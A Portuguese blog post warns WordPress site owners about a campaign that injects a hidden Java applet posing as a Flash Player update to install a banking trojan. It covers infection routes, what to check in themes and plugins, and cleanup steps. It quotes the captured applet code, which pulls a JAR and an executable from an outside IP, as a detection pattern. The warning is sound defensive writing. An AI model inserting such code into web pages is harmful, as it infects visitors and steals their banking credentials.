Está rolando há algumas semanas já, mas como tenho visto voltando, achei melhor alertar por aqui e pedir que espalhem o aviso. Um applet malicioso distribui trojan como se fosse atualização do plugin Flash em blogs, principalmente, mas não exclusivamente.
Os atacantes estão usando diversas formas de fazer com que o código malicioso seja implementado nos blogs:
1. Explorando falha em blogs com versão desatualizada do WordPress
De tempos em tempos o WordPress, plataforma de blogs gratuita e muito utilizada em todo o mundo, disponibiliza atualizações de seus arquivos. Algumas dessas atualizações incluem correções de falhas de segurança. É sempre importante ficar atento e fazer os updates quando solicitado.
Nas versões mais novas do WP, isso pode ser feito em apenas 2 cliques, sem qualquer dificuldade por parte de quem utiliza o WP e não possui habilidades com servidores e procedimentos técnicos. O próprio sistema faz tudo por você, mas você precisa pedir que ele se atualize.
Na área administrativa do blog, você verá um aviso marcado em amarelo no topo da página, avisando que existe uma atualização disponível e um link para atualizar. Ao clicar nesse link, uma nova tela será aberta para confirmar a atualização, basta clicar no botão “atualizar automaticamente”. Lembrando que a versão mais nova disponível é a 2.9.2.
2. Distribuindo em temas gratuitos disponíveis para download
Evite baixar temas de outros sites que não estejam no repositório de temas oficial do WordPress. Se fizer isso, pois existem vários temas Premium fora do repositório, principalmente os que não são gratuitos, sempre procure dentro do código fonte por chamadas estranhas.
O que você deve procurar:
- Chamadas externas de qualquer natureza. Se o tema pede uma inclusão de arquivo fora do seu domínio, desconfie e verifique do que se trata;
- Chamadas para arquivos Flash que não deveriam estar presentes no tema. Se você não baixou um tema com Flash, uma chamada dessas pode esconder um código malicioso.
- Chamadas para Applets. Essa praga era usada no tempo do ronca para executar coisas que hoje fazemos com Flash, CSS ou HTML5, portanto, deixe-a relegada aos bancos e suas traquitanas de segurança. Applet é um troço que roda na máquina do usuário e, se o mesmo permitir, pode fazer leitura e gravação em disco local, uma potencial falha de segurança (e a gente sabe que o usuário permite sempre né?).
- Links estranhos escondidos com CSS. Muitos temas podem servir para referenciar sites maliciosos, fazendo com que os backlinks para esses sites os destaquem nos mecanismos de busca. Não suporte parasitas, só dê link para o autor do tema, se não for um site-armadilha.
3. Distribuindo em plugins gratuitos disponíveis para download
Os plugins agem no WordPress como extensão do aplicativo. Isso faz com que o comportamento do sistema possa ser comprometido e o seu blog se tornar vítima de golpe ou distribuidor de arquivos maliciosos. Se você não tem habilidades técnicas para verificar o código de um plugin, baixe sempre de sites confiáveis, como o próprio repositório do WordPress. Leia os comentários dos usuários sobre o plugin, a compatibilidade e se verificar algum problema, relate, é sua ajuda que faz com que o repositório se mantenha limpo.
O trojan que está sendo distribuído
O arquivo está sendo distribuído como uma atualização do plugin Flash e solicita a permissão do usuário para instalá-lo. O malware, disfarçado com o nome de Plugin.exe, foi analisado pelo VirusTotal como Trojan Downloader (provavelmente um Banker, utilizado para roubar senhas dos usuários ao acessarem Internet Banking).
Ao acessar um site infectado, a seguinte tela surge:
Essa é a deixa de que existe um problema no site. Note que ele busca o arquivo externamente, através de um IP de outro país, o que já dispara nossos alarmes. Se o usuário clicar em “negar”, tudo certo para ele, não será infectado dessa vez (espero que se lembre sempre disso).
O código malicioso
Eu coletei do blog acima um trecho de código que dispara a ação do trojan. O mesmo código foi notado em outros 3 blogs, portanto, pode ser um padrão a ser buscado, mas não acredite que seja o único. O mesmo arquivo pode vir com outro nome, de outro IP e através de outra chamada que não seja um applet, então, entenda o trecho abaixo como apenas uma das possibilidades.
<applet name=”Clique em RUN – Adobe FlashPlayer 10.0.015.7″ code=”Inicio.class” archive=”http://174.37.21.130/…/FlashPlayer.jar” height=”0″ width=”0″> <param name=”url” value=”http://174.37.21.130/…/Plugin.exe”></applet><applet name=”Clique em RUN – Adobe FlashPlayer 10.0.015.7″ code=”Inicio.class” archive=”http://174.37.21.130/…/FlashPlayer.jar” height=”0″ width=”0″> <param name=”url” value=”http://174.37.21.130/…/Plugin.exe”></applet>
O que fazer se descobrir seu site infectado
O primeiro a ser feito é remover o código malicioso, atualizar os arquivos e zerar o cache do servidor. Depois verifique os seguintes problemas de fácil detecção:
- Seu sistema de blogs está atualizado para a última versão?
- Existe algum login de usuário desconhecido que você mesmo não tenha criado?
- Todos possuem acesso aos arquivos de tema? Todos possuem senhas fortes?
- A senha do admin não é trocada há quanto tempo? É forte? (dica: troque imediatamente)
- Existe algum arquivo diferente em seu servidor, que não sejam os arquivos do próprio CMS e as imagens e arquivos do tema que você mesmo fez upload? (dica: olhe a pasta de uploads do servidor)
Avise aos seus leitores sobre a possível ameaça, oriente-os a não permitir esse tipo de execução em seus computadores e indique-os bons antivírus. Se assim desejar, agradeço a indicação do meu outro blog Balela.info, em que trato especificamente sobre esse assunto.
Se você descobrir algum outro código que esteja sendo utilizado para distribuir malwares, comente aqui e ajude a espalhar a notícia.
wpDiscuz